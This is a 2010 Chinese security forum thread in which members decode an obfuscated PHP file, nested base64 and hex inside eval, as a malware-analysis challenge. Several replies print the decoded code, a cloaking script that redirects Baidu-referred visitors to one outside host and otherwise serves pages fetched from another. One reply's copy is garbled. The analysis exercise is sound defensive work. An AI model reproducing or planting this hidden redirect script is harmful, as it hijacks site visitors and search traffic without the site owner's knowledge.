php文件解密(已结束) bbs.ikaka.com

Anges() - 2010-8-15 12:17:00

php文件解密
里面不存在在网马
只要解出url地址即可
要求分析下加密方法
可以使用任意软件
解密出的，networkedition会加分，请各位童鞋jj参加。

CODE:

<?php
eval (base64_decode
('ZnVuY3Rpb24gaGV4MmJpbigkZGF0YSl7DQoJJG5ld2RhdGE9IiI7DQoJJGxlbiA9IHN0cmxlbigkZGF0YSk7DQoJ
Zm9yKCRpPTA7JGkgPCAkbGVuOyRpKz0yKXsNCgkJJG5ld2RhdGEuPXBhY2so'.'IkMiLGhleGRlYyhzdWJzdHIoJGR
hdGEsJGksMikpKTsNCgl9DQoJcmV0dXJuICRuZXdkYXRhOw0KfQ=='));
eval (hex2bin
('6572726F725F7265706F7274696E6728455F4552524F52293B0D0A6865616465722822636F6E74656E742D547970653A20746578742F68746D6C3B20636861727365743D67623233313222293B0D0A66756E6374696F6E207265616475726C282475726C290D0A7B0D0A707265675F6D617463685F616C6C28222F687474705C3A5C2F5C2F285B5E7E5D2A3F295C2F2F69222C2475726C2C24746D70293B0D0A246670203D204066736F636B6F70656E2824746D705B315D5B305D2C3830293B0D0A406670757473282466702C2247455420222E2475726C2E2220485454502F312E315C725C6E486F73743A222E24746D705B315D5B305D2E225C725C6E436F6E6E656374696F6E3A20436C6F73655C725C6E5C725C6E22293B0D0A7768696C652028246670202626202166656F662824667029290D0A2472657370202E3D206672656164282466702C2031303234293B0D0A4066636C6F736528246670293B0D0A2464617461203D206578706C6F646528273C21444F4354595045272C2472657370293B0D0A72657475726E207374725F7265706C61636528272F676F6F642F272C27272C273C21444F4354595045272E24646174615B315D293B0D0A7D0D0A6966287374726973747228245F5345525645525B27485454505F52454645524552275D2C2762616964752E636F6D2F733F2729290D0A7B0D0A48656164657228224C6F636174696F6E3A20687474703A2F2F33323737392E64783030312E68746964632E636F6D2F776F772F776F772E68746D6C3F222E245F5345525645525B275345525645525F4E414D45275D293B0D0A7D0D0A656C7365206563686F207265616475726C2827687474703A2F2F7777772E687967726A2E636F6D2F776F772F696E6465782E70687027293B0D0A'));
?>

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

leo108 - 2010-8-15 12:23:00

[复制到剪贴板]

CODE:

<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
function readurl($url)
{
preg_match_all("/http\:\/\/([^~]*?)\//i",$url,$tmp);
$fp = @fsockopen($tmp[1][0],80);
@fputs($fp,"GET ".$url." HTTP/1.1\r\nHost:".$tmp[1][0]."\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
@fclose($fp);
$data = explode('<!DOCTYPE',$resp);
return str_replace('/good/','','<!DOCTYPE'.$data[1]);
}
if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/s?'))
{
Header("Location: [url]http://32779.dx001.htidc.com/wow/wow.html?[/url]".$_SERVER['SERVER_NAME']);
}
else
echo readurl('http://www.hygrj.com/wow/index.php');
?>

首先frshow把第一句base64解密，发现是一个函数hex2bin

[复制到剪贴板]

CODE:

function hex2bin($data){
$newdata="";
$len = strlen($data);
for($i=0;$i < $len;$i+=2){
$newdata.=pack("C",hexdec(substr($data,$i,2)));
}
return $newdata;
}

直接替换第二个eval为echo。在php环境下运行即可得代码

不知道楼主想要哪一个地址

Anges() - 2010-8-15 12:25:00

good。继续观战。。

BlastXiang - 2010-8-15 12:32:00

error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
function readurl($url)
{
preg_match_all("/http\:\/\/([^~]*?)\//i",$url,$tmp);
$fp = @fsockopen($tmp[1][0],80);
@fputs($fp,"GET ".$url." HTTP/1.1\r\nHost:".$tmp[1][0]."\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
@fclose($fp);
$data = explode('<!DOCTYPE',$resp);
return str_replace('/good/','','<!DOCTYPE'.$data[1]);
}
if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/s?'))
{
Header("Location: hxxp://32779.dx001.htidc.com/wow/wow.html?".$_SERVER['SERVER_NAME']);
}
else echo readurl('hxxp://www.hygrj.com/wow/index.php');

MM啊双倍分不

是昔流芳 - 2010-8-15 12:34:00

膜拜楼上blast:default6:

BlastXiang - 2010-8-15 12:40:00

:kaka17: LZ才是真正的大牛

话说MM赶紧的四倍分-，-

leo108 - 2010-8-15 12:42:00

:kaka17: 额。。。。貌似我解出的时间比你早吧
给我分:kaka18:

Anges() - 2010-8-15 12:50:00

:kaka10: 都是大牛。。。。。。我出绝招了。
出绝招了。等着。我发帖。。。

leo108 - 2010-8-15 12:52:00

速度出哈。。。。。暑假网马解密没作业，不爽。。。。。赶紧来几个耍耍:kaka12:

Anges() - 2010-8-15 12:57:00

出了。有难度哦。。:kaka12:

http://bbs.ikaka.com/showtopic-8751818.aspx

jks_风 - 2010-8-16 2:11:00

额，师傅一个是base64一个是hex。。

FreShow和神器一步就XXOO了。。没难度难度的是你的第二个说实在的我不会解密:kaka4:

jks_风 - 2010-8-16 2:12:00

[复制到剪贴板]

CODE:

function hex2bin($data){
$newdata="";
$len = strlen($data);

[复制到剪贴板]

CODE:

error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
function readurl($url)
{
preg_match_all("/http\:\/\/([^~]*?)\//i",$url,$tmp);
$fp = @fsockopen($tmp[1][0],80);
@fputs($fp,"GET ".$url." HTTP/1.1\r\nHost:".$tmp[1][0]."\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
@fclose($fp);
$data = explode('return str_replace('/good/','','}
if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/s?'))
{
Header("Location: [url]http://32779.dx001.htidc.com/wow/wow.html?[/url]".$_SERVER['SERVER_NAME']);
}
else echo readurl('http://www.hygrj.com/wow/index.php');

瑞星卡卡安全论坛